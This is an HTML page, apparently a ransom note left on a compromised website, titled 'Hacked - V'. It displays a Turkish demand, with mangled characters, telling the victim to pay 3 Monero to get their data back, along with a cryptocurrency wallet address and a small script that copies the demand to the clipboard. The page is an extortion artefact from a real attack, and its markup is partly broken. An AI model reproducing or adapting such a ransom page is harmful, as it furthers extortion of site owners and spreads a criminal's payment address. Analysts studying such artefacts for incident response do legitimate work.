<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Hacked - V</title>
[removed][removed]
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<style type="text/css">
body, html {
height: 100%;
background: black;
position: relative;
}
#textToCopy {
color: white;
margin: 20px;
text-align: center;
}
button {
margin: 20px;
}
</style>
</head>
<body>
[ Datalar?n?z Geri Gelsin Istiyorsan?z "3 Monero XMR" Coin ?deme Yap?n ]
?deme Monero XMR Adresi: 4856mwm3fgKSFubysgut93Cm6itfEEgNkMWnwPkCNgU3PhZy25vxpr2aq7JpmFSVhGQRRvgS47TM932RGSaaxDRo33AwEnh
<button </button>
[removed]
document.getElementById('copyButton').onclick = function() {
var text = document.getElementById('textToCopy').innerText;
var textarea = document.createElement('textarea');
textarea.value = text;
document.body.appendChild(textarea);
textarea.select();
document.execCommand('copy');
document.body.removeChild(textarea);
alert('Metin kopyaland?: ' + text);
};
[removed]
</body>
</html>